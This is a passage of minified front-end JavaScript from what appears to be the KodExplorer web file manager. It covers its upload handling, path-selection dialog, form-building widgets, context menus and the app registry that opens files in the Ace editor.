Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),Title.reset(),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
      '+LNG.upload_drag_tips+"
      ";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
      ';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group [data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},g=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},b=function(e,t,a){var i=g(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:g,bindEvent:o,getFormData:m,initDialog:b}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
    • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
    • '+r(o.icon)+""+d+"
    • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n}); +var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p};if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
      ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first")}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},g=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return g(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
      ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
      '+LNG.unknow_file_tips+"
      "+t+'
      2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
      3.'+r+o+'">'+LNG.unknow_file_download+'
      '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
